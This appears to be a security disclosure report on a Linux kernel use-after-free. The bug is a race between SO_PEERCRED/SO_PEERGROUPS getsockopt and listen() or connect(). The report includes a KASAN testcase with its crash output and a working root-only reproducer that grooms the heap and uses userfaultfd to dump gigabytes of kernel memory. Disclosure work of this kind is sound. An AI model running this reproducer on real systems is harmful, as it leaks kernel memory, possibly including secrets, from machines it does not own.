Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())

# bug description

In sock_getsockopt() (in net/core/sock.c), the handlers for the socket options SO_PEERCRED (which has probably had a data race since forever; that race got turned into a UAF read in v2.6.36, commit "af_unix: Allow SO_PEERCRED to work across namespaces") and SO_PEERGROUPS (introduced in v4.13, commit "net: introduce SO_PEERGROUPS getsockopt") don't use any locking when copying data from sk->sk_peer_cred to userspace.

This can race with operations that update sk->sk_peer_cred:

- unix_stream_connect() (via copy_peercred(), on CLOSE->ESTABLISHED)
- unix_listen() (via init_peercred(), on CLOSE->LISTEN or LISTEN->LISTEN)

This means that if the creds are replaced and freed at the wrong time, a use-after-free read occurs.

From what I can tell, the impact on the kernel is limited to data leakage. Theoretically, it could also lead to an out-of-bounds *write* to *userspace* memory if a victim process calls SO_PEERGROUPS on a socket whose ->sk_peer_cred is going away; however, in a normal scenario, SO_PEERGROUPS would only be called on a socket from accept(), and a less-privileged attacker wouldn't be able to switch out the ->sk_peer_cred on that socket.

# simple testcase

In a Linux VM with CONFIG_KASAN=y and CONFIG_RCU_STRICT_GRACE_PERIOD=y, this issue can be demonstrated with the following testcase.

Note that this testcase is using SO_PEERCRED in a weird way: It reads the "peer credentials" of a listening socket, which doesn't really make any semantic sense. As far as I can tell from reading the code, you could also trigger the same UAF by racing SO_PEERCRED with repeated calls to connect() and shutdown(fd, SHUT_RDWR) instead of listen(), but then the race would get more complicated.
``` // compile with \"gcc -pthread -o peercred_uaf peercred_uaf.c -Wall\" #define _GNU_SOURCE #include #include #include #include #include #include #include #include static int s; static uid_t my_uid; static gid_t my_gid; void *ucred_thread(void *dummy) { while (1) { struct ucred ucred; socklen_t optlen = sizeof(ucred); if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &ucred, &optlen)) perror(\"getsockopt\"); } } int main(void) { my_uid = getuid(); my_gid = getgid(); s = socket(AF_UNIX, SOCK_STREAM, 0); if (s == -1) err(1, \"socket\"); struct sockaddr_un bind_addr = { .sun_family = AF_UNIX, .sun_path = \"/tmp/unix-test-socket\" }; unlink(bind_addr.sun_path); if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr))) err(1, \"bind\"); pthread_t thread; if (pthread_create(&thread, NULL, ucred_thread, NULL)) errx(1, \"pthread_create\"); while (1) { if (listen(s, 16)) perror(\"listen\"); // avoid glibc's automatic thread sync in set*id() wrappers! // note that setfsuid() doesn't reallocate on no-op request. if (syscall(__NR_setresuid, my_uid, my_uid, my_uid)) err(1, \"setresuid(raw)\"); } } ``` This results in the following splat: ``` BUG: KASAN: use-after-free in sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555) Read of size 4 at addr ffff8880355c7c64 by task peercred_uaf/619 CPU: 2 PID: 619 Comm: peercred_uaf Not tainted 5.15.0-rc2-00008-g4c17ca27923c #849 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 Call Trace: dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1)) print_address_description.constprop.0 (mm/kasan/report.c:257) [...] kasan_report.cold (mm/kasan/report.c:443 mm/kasan/report.c:459) [...] sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555) [...] __sys_getsockopt (net/socket.c:2216) [...] __x64_sys_getsockopt (net/socket.c:2232) [...] 
do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113) RIP: 0033:0x7f93cd99a5ca Code: 48 8b 0d c9 08 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 37 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 96 08 0c 00 f7 d8 64 89 01 48 All code ======== 0: 48 8b 0d c9 08 0c 00 mov 0xc08c9(%rip),%rcx # 0xc08d0 7: f7 d8 neg %eax 9: 64 89 01 mov %eax,%fs:(%rcx) c: 48 83 c8 ff or $0xffffffffffffffff,%rax 10: c3 ret 11: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1) 18: 00 00 00 1b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 20: 49 89 ca mov %rcx,%r10 23: b8 37 00 00 00 mov $0x37,%eax 28: 0f 05 syscall 2a:* 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax <-- trapping instruction 30: 73 01 jae 0x33 32: c3 ret 33: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08d0 3a: f7 d8 neg %eax 3c: 64 89 01 mov %eax,%fs:(%rcx) 3f: 48 rex.W Code starting with the faulting instruction =========================================== 0: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax 6: 73 01 jae 0x9 8: c3 ret 9: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08a6 10: f7 d8 neg %eax 12: 64 89 01 mov %eax,%fs:(%rcx) 15: 48 rex.W RSP: 002b:00007f93cd89bec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000037 RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f93cd99a5ca RDX: 0000000000000011 RSI: 0000000000000001 RDI: 0000000000000003 RBP: 00007f93cd89bef0 R08: 00007f93cd89bee0 R09: 00007f93cd89c700 R10: 00007f93cd89bee4 R11: 0000000000000246 R12: 00007ffff07f1cee R13: 00007ffff07f1cef R14: 00007f93cd89c700 R15: 0000000000000000 Allocated by task 618: kasan_save_stack (mm/kasan/common.c:38) __kasan_slab_alloc (mm/kasan/common.c:46 mm/kasan/common.c:434 mm/kasan/common.c:467) kmem_cache_alloc (./include/linux/kasan.h:254 mm/slab.h:519 mm/slub.c:3206 mm/slub.c:3214 mm/slub.c:3219) prepare_creds (kernel/cred.c:262) __sys_setresuid (kernel/sys.c:666) do_syscall_64 
(arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113) Freed by task 618: kasan_save_stack (mm/kasan/common.c:38) kasan_set_track (mm/kasan/common.c:46) kasan_set_free_info (mm/kasan/generic.c:362) __kasan_slab_free (mm/kasan/common.c:368 mm/kasan/common.c:328 mm/kasan/common.c:374) kmem_cache_free (mm/slub.c:1725 mm/slub.c:3483 mm/slub.c:3499) rcu_core (kernel/rcu/tree.c:2515 kernel/rcu/tree.c:2743) __do_softirq (./include/linux/instrumented.h:71 ./include/linux/atomic/atomic-instrumented.h:27 ./include/linux/jump_label.h:266 ./include/linux/jump_label.h:276 ./include/trace/events/irq.h:142 kernel/softirq.c:559) Last potentially related work creation: kasan_save_stack (mm/kasan/common.c:38) kasan_record_aux_stack (mm/kasan/generic.c:348) call_rcu (kernel/rcu/tree.c:2988 kernel/rcu/tree.c:3067) init_peercred (./include/linux/cred.h:288 ./include/linux/cred.h:281 net/unix/af_unix.c:613) unix_listen (net/unix/af_unix.c:648) __sys_listen (net/socket.c:1727) __x64_sys_listen (net/socket.c:1734) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113) The buggy address belongs to the object at ffff8880355c7c40 which belongs to the cache cred_jar of size 192 The buggy address is located 36 bytes inside of 192-byte region [ffff8880355c7c40, ffff8880355c7d00) The buggy address belongs to the page: page:ffffea0000d57100 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x355c4 head:ffffea0000d57100 order:2 compound_mapcount:0 compound_pincount:0 flags: 0x4000000000010200(slab|head|zone=1) raw: 4000000000010200 ffffea0000d57208 ffffea0000d57008 ffff88800642d1c0 raw: 0000000000000000 0000000000190019 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff8880355c7b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff8880355c7b80: fc fc fc fc fc fc fc fc fc 
fc fc fc fc fc fc fc >ffff8880355c7c00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb ^ ffff8880355c7c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff8880355c7d00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ``` # root-only reproducer for normal systems The following is a simple reproducer that attempts to use this issue to dump gigabytes of out-of-bounds kernel memory via SO_PEERGROUPS, which effectively reads a copy length (sk->sk_peer_cred->group_info->ngroups) from a dangling pointer in groups_to_user(). (Note: There are two functions called groups_to_user(). The relevant one is in net/core/sock.c.) This isn't quite a real exploit - it **requires root privileges** to call setgroups() and, if userfaultfd is restricted, also to trap a kernel fault with userfaultfd. I expect that you could get around those limitations with some work though, assuming that the attacker is running in a normal Linux userspace. Note that this bug can still be used to dump gigabytes of kernel heap memory, even if CONFIG_HARDENED_USERCOPY is enabled, because the out-of-bounds read occurs outside of usercopy code: ``` static int groups_to_user(gid_t __user *dst, const struct group_info *src) { struct user_namespace *user_ns = current_user_ns(); int i; for (i = 0; i < src->ngroups; i++) if (put_user(from_kgid_munged(user_ns, src->gid[i]), dst + i)) return -EFAULT; return 0; } ``` ``` // gcc -o peergroups-leak peergroups-leak.c -Wall -pthread #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include // kernel sets upper limit: 65536. // up to 2 pages will be served by slabs, we probably don't want that. 
// choose a size between order-3 and order-4 (means needs order-4 page) #define ALLOC_SIZE ((0x1000 << 3) * 3 / 2) #define NUM_GROUPS ((ALLOC_SIZE - 8) / 4) #define OUTPUT_MAPPING_LEN 0x400000000 static int s; static int launch_eventfd; static unsigned char *output_mapping; static void *getsockopt_threadfn(void *dummy) { eventfd_t evval; if (eventfd_read(launch_eventfd, &evval)) err(1, \"eventfd_read\"); socklen_t optlen = INT_MAX; if (getsockopt(s, SOL_SOCKET, SO_PEERGROUPS, output_mapping, &optlen)) { perror(\"getsockopt\"); //system(\"cat /proc/$PPID/maps | grep -v AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"); exit(1); } return NULL; } void dump(char *label) { printf(\"\ === DUMP %s ===\ \", label); system(\"grep 'Node.*Unmovable' /proc/pagetypeinfo\"); } int main(void) { char dummy_char; // set up sleep-inducing mapping output_mapping = mmap(NULL, OUTPUT_MAPPING_LEN+0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (output_mapping == MAP_FAILED) err(1, \"mmap\"); if (mprotect(output_mapping+OUTPUT_MAPPING_LEN, 0x1000, PROT_NONE)) err(1, \"mprotect\"); int uffd = syscall(__NR_userfaultfd, O_CLOEXEC); if (uffd == -1) err(1, \"userfaultfd\"); struct uffdio_api api = { .api = UFFD_API, .features = 0 }; if (ioctl(uffd, UFFDIO_API, &api)) err(1, \"UFFDIO_API\"); struct uffdio_register reg = { .range = {.start = (unsigned long)output_mapping, .len = 0x1000}, .mode = UFFDIO_REGISTER_MODE_MISSING }; if (ioctl(uffd, UFFDIO_REGISTER, ®)) err(1, \"UFFDIO_REGISTER\"); // prepare getsockopt() thread launch_eventfd = eventfd(0, 0); if (launch_eventfd == -1) err(1, \"eventfd\"); pthread_t thread; if (pthread_create(&thread, NULL, getsockopt_threadfn, NULL)) errx(1, \"pthread_create\"); // set up for reallocation primitive int realloc_fd = open(\"/proc/self/maps\", O_RDONLY); if (realloc_fd == -1) err(1, \"open maps\"); char tmpdir[] = \"/tmp/blah.XXXXXX\"; if (mkdtemp(tmpdir) == NULL) err(1, \"mkdtemp\"); if (chdir(tmpdir)) err(1, \"chdir tmpdir\"); char 
dummy_name[100]; memset(dummy_name, 'A', 99); dummy_name[99] = '\\0'; char move_target[200]; sprintf(move_target, \"d/%s\", dummy_name); mkdir(dummy_name, 0700); char file_path[200]; sprintf(file_path, \"%s/a\", dummy_name); int path_len = strlen(tmpdir) + strlen(file_path); // approximate { int fd = open(file_path, O_CREAT|O_RDWR, 0600); if (fd == -1) err(1, \"open deep file\"); if (mmap((void*)0x10000UL, 0x1000, PROT_READ, MAP_SHARED, fd, 0) == MAP_FAILED) err(1, \"mmap deep\"); } bool half_deep_probed = false; while (path_len < ALLOC_SIZE) { mkdir(\"d\", 0700); if (rename(dummy_name, move_target)) err(1, \"rename\"); if (rename(\"d\", dummy_name)) err(1, \"rename 2\"); path_len += strlen(dummy_name) + 1; if (!half_deep_probed && path_len >= ALLOC_SIZE / 2) { half_deep_probed = true; if (pread(realloc_fd, &dummy_char, 1, 0) != 1) err(1, \"read maps half-deep\"); } } s = socket(AF_UNIX, SOCK_STREAM, 0); if (s == -1) err(1, \"socket\"); struct sockaddr_un bind_addr = { .sun_family = AF_UNIX, .sun_path = \"/tmp/unix-test-socket\" }; unlink(bind_addr.sun_path); if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr))) err(1, \"bind\"); pid_t child = fork(); if (child == -1) err(1, \"fork\"); if (child == 0) { gid_t gid_list[NUM_GROUPS]; gid_t my_gid = getgid(); for (int i=0; i> 62) == 0) break; filled_pages++; } printf(\"got %lu pages\ \", filled_pages); FILE *hexdump = popen(\"hexdump -C\", \"w\"); if (!hexdump) err(1, \"popen\"); fwrite(output_mapping, filled_pages * 0x1000, 1, hexdump); pclose(hexdump); } ``` # disclosure deadline This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2021-12-27. Found by: jhannh@google.com